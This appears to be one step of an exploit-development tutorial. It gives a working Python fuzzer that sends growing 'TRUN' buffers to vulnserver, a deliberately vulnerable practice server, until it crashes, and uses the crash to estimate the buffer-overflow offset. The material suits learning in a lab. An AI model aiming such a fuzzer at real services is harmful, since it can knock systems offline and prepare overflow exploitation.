Step 1: Fuzzing

AAAAAAAA

Restart vulnserver by pressing Ctrl+F2 in Immunity Debugger and then run it by pressing F9. Run the fuzzer to crash the executable's TRUN command:

fuzzer.py

#!/usr/bin/python3
import sys, socket
from time import sleep

#--------Changeme--------#
                         #
host = "192.168.1.2"     #
port = 9999              #
                         #
#------------------------#

buffer = b"A" * 100

while True:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))

        payload = b"TRUN /.:/" + buffer

        print(f"[+] Sending the payload of length {len(buffer)}...")
        s.send(payload)
        s.close()

        sleep(1)
        buffer += b"A" * 100

    except:
        print(f"Fuzzer crashed at {len(buffer)} bytes")
        sys.exit()

Here we should manually encode everything with b"" instead of using .encode() since .encode() turns a byte into its Unicode representation:

Unicode

After a while, vulnserver crashes:

Crash

Here we learn that the offset is less than 3000 bytes. We only want to know an approximate value in this step, and we will figure out the exact offset in the next step.